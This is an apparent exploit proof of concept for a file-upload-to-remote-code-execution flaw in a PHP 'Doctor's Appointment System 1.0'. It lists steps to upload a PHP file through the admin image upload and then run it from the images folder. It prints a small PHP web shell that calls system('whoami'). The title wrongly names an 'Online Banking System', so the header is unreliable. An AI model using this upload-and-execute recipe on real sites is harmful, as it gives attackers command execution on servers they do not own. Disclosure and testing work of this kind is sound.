Tittle: Online Banking System (File Upload to RCE)
Author: (B3nj1)
Vendor Homepage: https://www.sourcecodester.com/
Software Link: Doctor's Appointment System
Version: 1.0
CVE:
- Description: Doctor's Appointment System 1.0 is vulnerable to File Upload to RCE via Image upload from the administrator panel. An attacker can obtain remote command execution just by knowing the path where the images are stored.
Steps to reproduce:
- 1- Go to http://localhost/doctors_appointment/admin/index.php?page=site_settings
- 2- Add an image, which in this case would be our payload
- 3- Going to that url we will execute the code
http://localhost/doctors_appointment/assets/img/1651595100_b3nj1.php
Payload
<?php
echo system('whoami');
echo "\nits working!!";
?>
